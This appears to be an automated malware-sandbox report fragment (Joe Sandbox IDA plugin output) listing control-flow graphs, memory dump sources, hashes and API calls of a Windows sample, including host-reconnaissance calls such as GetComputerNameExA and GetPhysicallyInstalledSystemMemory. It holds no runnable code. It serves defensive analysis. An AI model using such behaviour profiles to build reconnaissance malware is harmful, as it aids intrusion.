                                                                                    control_flow_graph 586 c7c6d7-c7c6ff 587 c7c700-c7c74f 586->587 587->587 588 c7c751-c7c761 587->588 589 c7c763-c7c76f 588->589 590 c7c77b-c7c787 588->590 593 c7c770-c7c779 589->593 591 c7c7a1-c7c803 call c8ce00 call c6dc20 590->591 592 c7c789-c7c78b 590->592 601 c7c810-c7c82a 591->601 594 c7c790-c7c79d 592->594 593->590 593->593 594->594 596 c7c79f 594->596 596->591 601->601 602 c7c82c-c7c85f 601->602 603 c7c860-c7c886 602->603 603->603 604 c7c888-c7c892 603->604 605 c7c894-c7c89b 604->605 606 c7c8ab-c7c8b3 604->606 607 c7c8a0-c7c8a9 605->607 608 c7c8b5-c7c8b6 606->608 609 c7c8cb-c7c8d8 606->609 607->606 607->607 610 c7c8c0-c7c8c9 608->610 611 c7c8fb-c7c946 609->611 612 c7c8da-c7c8e1 609->612 610->609 610->610 614 c7c950-c7c978 611->614 613 c7c8f0-c7c8f9 612->613 613->611 613->613 614->614 615 c7c97a-c7c984 614->615 616 c7c986-c7c98f 615->616 617 c7c99b-c7c9a5 615->617 618 c7c990-c7c999 616->618 619 c7c9a7-c7c9ab 617->619 620 c7c9bb-c7ca35 617->620 618->617 618->618 622 c7c9b0-c7c9b9 619->622 621 c7cad8-c7cb04 620->621 623 c7cb10-c7cb60 621->623 622->620 622->622 623->623 624 c7cb62-c7cb72 623->624 625 c7cb74-c7cb76 624->625 626 c7cb8b-c7cb97 624->626 627 c7cb80-c7cb89 625->627 628 c7cbb1-c7cbf7 call c8ce00 GetPhysicallyInstalledSystemMemory call c6dc20 626->628 629 c7cb99-c7cb9b 626->629 627->626 627->627 635 c7cbfc-c7cc13 628->635 630 c7cba0-c7cbad 629->630 630->630 632 c7cbaf 630->632 632->628 636 c7cc20-c7cc3a 635->636 636->636 637 c7cc3c-c7cc6f 636->637 638 c7cc70-c7cc96 637->638 638->638 639 c7cc98-c7cca2 638->639 640 c7cca4-c7ccab 639->640 641 c7ccbb-c7ccc3 639->641 642 c7ccb0-c7ccb9 640->642 643 c7ccc5-c7ccc6 641->643 644 c7ccdb-c7cce8 641->644 642->641 642->642 645 c7ccd0-c7ccd9 643->645 646 c7cd0b-c7cd56 644->646 647 c7ccea-c7ccf1 644->647 645->644 645->645 649 c7cd60-c7cd88 646->649 648 c7cd00-c7cd09 647->648 648->646 648->648 649->649 650 c7cd8a-c7cd98 649->650 651 c7cdbb-c7cdc5 650->651 652 c7cd9a-c7cda1 650->652 654 c7ca40-c7cad5 651->654 655 c7cdcb 651->655 653 c7cdb0-c7cdb9 652->653 653->651 653->653 654->621 656 c7cdd0-c7cdd9 655->656 656->656 657 c7cddb 656->657 657->654
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: '$iJ
                                                                                    • API String ID: 0-30662343
                                                                                    • Opcode ID: 22ad7e08a7cbc5932c3031221ed17379f7e7557b0179052eb5bfa0edc7c3e1bb
                                                                                    • Instruction ID: 12b913ab82194f8af26d45dfd7bbbfb45c4bb91e11099a75a64706558c313435
                                                                                    • Opcode Fuzzy Hash: 22ad7e08a7cbc5932c3031221ed17379f7e7557b0179052eb5bfa0edc7c3e1bb
                                                                                    • Instruction Fuzzy Hash: A602D47060C3D28FD729CF2990A03ABBFE1AF97304F18896DE4D997282D77985058B57

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 658 c7bfd3-c7c0e8 call c8ce00 661 c7c0ed-c7c13a GetComputerNameExA 658->661 662 c7c140-c7c167 661->662 662->662 663 c7c169-c7c173 662->663 664 c7c175-c7c17f 663->664 665 c7c18d 663->665 667 c7c180-c7c189 664->667 666 c7c18f-c7c19c 665->666 669 c7c19e-c7c1a5 666->669 670 c7c1bb-c7c20f GetComputerNameExA 666->670 667->667 668 c7c18b 667->668 668->666 671 c7c1b0-c7c1b9 669->671 672 c7c210-c7c252 670->672 671->670 671->671 672->672 673 c7c254-c7c25e 672->673 674 c7c260-c7c267 673->674 675 c7c27b-c7c288 673->675 676 c7c270-c7c279 674->676 677 c7c2ab-c7c2ff 675->677 678 c7c28a-c7c291 675->678 676->675 676->676 681 c7c300-c7c324 677->681 679 c7c2a0-c7c2a9 678->679 679->677 679->679 681->681 682 c7c326-c7c330 681->682 683 c7c332-c7c339 682->683 684 c7c34b-c7c358 682->684 685 c7c340-c7c349 683->685 686 c7c37b-c7c3d6 call c8ce00 684->686 687 c7c35a-c7c361 684->687 685->684 685->685 692 c7c3e0-c7c3fa 686->692 688 c7c370-c7c379 687->688 688->686 688->688 692->692 693 c7c3fc-c7c406 692->693 694 c7c41b-c7c42f 693->694 695 c7c408-c7c40f 693->695 696 c7c435-c7c43c 694->696 697 c7c572-c7c5b1 694->697 698 c7c410-c7c419 695->698 699 c7c440-c7c44a 696->699 700 c7c5c0-c7c5e7 697->700 698->694 698->698 701 c7c460-c7c466 699->701 702 c7c44c-c7c451 699->702 700->700 703 c7c5e9-c7c5fb 700->703 705 c7c490-c7c49e 701->705 706 c7c468-c7c46b 701->706 704 c7c510-c7c516 702->704 707 c7c5fd-c7c604 703->707 708 c7c61b-c7c61e call c80520 703->708 714 c7c518-c7c51e 704->714 711 c7c4a4-c7c4a7 705->711 712 c7c52a-c7c533 705->712 706->705 709 c7c46d-c7c483 706->709 710 c7c610-c7c619 707->710 716 c7c623-c7c643 708->716 709->704 710->708 710->710 711->712 715 c7c4ad-c7c50e 711->715 718 c7c535-c7c537 712->718 719 c7c539-c7c53c 712->719 714->697 717 c7c520-c7c522 714->717 715->704 717->699 722 c7c528 717->722 718->714 720 c7c56e-c7c570 719->720 721 c7c53e-c7c56c 719->721 720->704 721->704 722->697
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00C7C113
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00C7C1D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: x
                                                                                    • API String ID: 3545744682-2363233923
                                                                                    • Opcode ID: c88328d779f01ed2e2636ebc3703763431fa2974d20206683ba040edd14f66c4
                                                                                    • Instruction ID: 22ad38e3917d5f769ca71901dba24004736b6b6d491becd935ddb8dd289a8a1c
                                                                                    • Opcode Fuzzy Hash: c88328d779f01ed2e2636ebc3703763431fa2974d20206683ba040edd14f66c4
                                                                                    • Instruction Fuzzy Hash: 18D1066060C7D28FD7358B3984903BBBBD1AFA7354F18856DD0D94B282D739850AD753

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 723 c597b0-c597be 724 c59c65 723->724 725 c597c4-c5982f call c55e60 call c57ff0 723->725 726 c59c67-c59c73 724->726 731 c59830-c59873 725->731 731->731 732 c59875-c59895 call c59070 731->732 735 c598a0-c598b4 732->735 735->735 736 c598b6-c598df call c59070 735->736 739 c598e0-c5992b 736->739 739->739 740 c5992d-c59966 call c59070 739->740 743 c59970-c599ca 740->743 743->743 744 c599cc-c599d6 743->744 745 c599e0-c59a12 744->745 745->745 746 c59a14-c59a3b call c59070 745->746 749 c59a40-c59a59 746->749 749->749 750 c59a5b-c59b29 call c59360 749->750 753 c59b30-c59b82 750->753 753->753 754 c59b84-c59b8c 753->754 755 c59bb2-c59bbe 754->755 756 c59b8e-c59b96 754->756 758 c59bc0-c59bc3 755->758 759 c59be2-c59c0f 755->759 757 c59ba0-c59bb0 756->757 757->755 757->757 760 c59bd0-c59be0 758->760 761 c59c10-c59c24 759->761 760->759 760->760 761->761 762 c59c26-c59c3b call c5c350 761->762 764 c59c40-c59c63 call c58000 762->764 764->726
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EA66A9D61CD77F8D23D904AF30EFEBBC$EIFT$_P$w
                                                                                    • API String ID: 0-2672830221
                                                                                    • Opcode ID: 68fc7ed014f1ddeca9b7efd28ce94aab707b222f32d2c72d3762fe9c98889989
                                                                                    • Instruction ID: cd796d4eafc532a7d8dd982a822a3fbcff0425e2ebd565a8bbe1cfee43864993
                                                                                    • Opcode Fuzzy Hash: 68fc7ed014f1ddeca9b7efd28ce94aab707b222f32d2c72d3762fe9c98889989
                                                                                    • Instruction Fuzzy Hash: E6C145756083409BD718CF35C8526AFBBE6EBD1314F188A6DE4E687391DB38C909CB16

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 767 c76170-c7618f 768 c76190-c761bf 767->768 768->768 769 c761c1-c761cd 768->769 770 c76214-c76221 769->770 771 c761cf-c761d7 769->771 772 c76230-c76283 770->772 773 c761e0-c761e7 771->773 772->772 776 c76285-c76289 772->776 774 c761f0-c761f6 773->774 775 c761e9-c761ec 773->775 774->770 778 c761f8-c7620c call c8b480 774->778 775->773 777 c761ee 775->777 779 c76310-c76312 776->779 780 c7628f-c762af call c89b40 776->780 777->770 784 c76211 778->784 781 c764ef-c764f8 779->781 786 c762b0-c762df 780->786 784->770 786->786 787 c762e1-c762ed 786->787 788 c76336-c7633a 787->788 789 c762ef-c762f7 787->789 790 c764e6-c764ec call c89b60 788->790 791 c76340-c76349 788->791 792 c76300-c76307 789->792 790->781 795 c76350-c76365 791->795 793 c76317-c7631d 792->793 794 c76309-c7630c 792->794 793->788 798 c7631f-c7632e call c8b480 793->798 794->792 797 c7630e 794->797 795->795 799 c76367-c76369 795->799 797->788 804 c76333 798->804 802 c76370-c7637d call c57ff0 799->802 803 c7636b 799->803 807 c76390-c7639a 802->807 803->802 804->788 808 c76380-c7638e 807->808 809 c7639c-c7639f 807->809 808->807 810 c763b3-c763b7 808->810 811 c763a0-c763af 809->811 813 c764dd-c764e3 call c58000 810->813 814 c763bd-c763c8 810->814 811->811 812 c763b1 811->812 812->808 813->790 815 c7641b-c76467 call c57ff0 call c58e90 814->815 816 c763ca-c763d1 814->816 830 c76470-c764b8 815->830 818 c763ec-c763f0 816->818 822 c763f2-c763fb 818->822 823 c763e0 818->823 826 c76410-c76414 822->826 827 c763fd-c76400 822->827 825 c763e1-c763ea 823->825 825->815 825->818 826->825 829 c76416-c76419 826->829 827->825 829->825 830->830 831 c764ba-c764d9 call c58ff0 call c58000 830->831 831->813
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                    • API String ID: 2994545307-1799417857
                                                                                    • Opcode ID: 6186d20030fe5caa1f8a89b0a51c81f5064b52472c0d096bd8009b192218edb0
                                                                                    • Instruction ID: 83e1d9e3f17ad18919a106b83616ef700e7978395d99d34557ecbefa6927d9c9
                                                                                    • Opcode Fuzzy Hash: 6186d20030fe5caa1f8a89b0a51c81f5064b52472c0d096bd8009b192218edb0
                                                                                    • Instruction Fuzzy Hash: E29177B6E04B108BD724DE25DC8272B72A6EBD0314F1DC53CE9999B252E6349D04C7D5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 860 c587f0-c587fe call c8afd0 863 c58804-c5880b call c84680 860->863 864 c58979-c58981 ExitProcess 860->864 867 c58974 call c8b400 863->867 868 c58811-c58849 863->868 867->864 872 c58851-c588d6 868->872 873 c5884b-c5884f 868->873 875 c58950-c58968 call c59cc0 872->875 876 c588d8-c5894e 872->876 873->872 875->867 879 c5896a call c5cdf0 875->879 876->875 881 c5896f call c5b670 879->881 881->867
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(00000000), ref: 00C5897B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID: YO9W
                                                                                    • API String ID: 621844428-386669604
                                                                                    • Opcode ID: e8eba3f1ad2c3389221aa39194be6db6918794e066ebf940b9dd26da4e84cac2
                                                                                    • Instruction ID: cd0b71a72754f429d86a007af09cf6e7ace1d862bfee1abf567ef55d90df0e9b
                                                                                    • Opcode Fuzzy Hash: e8eba3f1ad2c3389221aa39194be6db6918794e066ebf940b9dd26da4e84cac2
                                                                                    • Instruction Fuzzy Hash: A8318A77F5022907C71C79B99C4636AB5874BC4614F0F863C9DE8AB386FDB89C0842D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 610a3f6c34f992875bc1bb372f3641b4bcc0a3db573d06ee70205e31339f38ec
                                                                                    • Instruction ID: 5d382941ea7e747643999d8271542eddca7c8730734c685cd2134678c69565f0
                                                                                    • Opcode Fuzzy Hash: 610a3f6c34f992875bc1bb372f3641b4bcc0a3db573d06ee70205e31339f38ec
                                                                                    • Instruction Fuzzy Hash: F3A124B5604B418FC734CF24C8D1623BBE2EF95310B098A6DD49B8B792E735E945CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: @CDE
                                                                                    • API String ID: 2994545307-1513065382
                                                                                    • Opcode ID: affa7bc2747b6539944a4d9a5efe98f3aa85fef16ac26fb13d60b29e857238ce
                                                                                    • Instruction ID: 6b116cc5fb71158e9a2437bf35653c0d36463c149de278bccd5f34bc2f23fd35
                                                                                    • Opcode Fuzzy Hash: affa7bc2747b6539944a4d9a5efe98f3aa85fef16ac26fb13d60b29e857238ce
                                                                                    • Instruction Fuzzy Hash: D2B134717483414BC328EB29C8D197BBBE6EBD6318F1C893CE49687392D634DC458796
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(00C8D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00C8B4AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: tuv
                                                                                    • API String ID: 0-2475268160
                                                                                    • Opcode ID: d702c466a46f7b0ae3a217f2b25aff9001dcead588582ef19e1b5bffb590435c
                                                                                    • Instruction ID: 8c663a24e7bc7ee6e49201ccc51fd568006de34e33aad0ba8af5831d4ad6c93b
                                                                                    • Opcode Fuzzy Hash: d702c466a46f7b0ae3a217f2b25aff9001dcead588582ef19e1b5bffb590435c
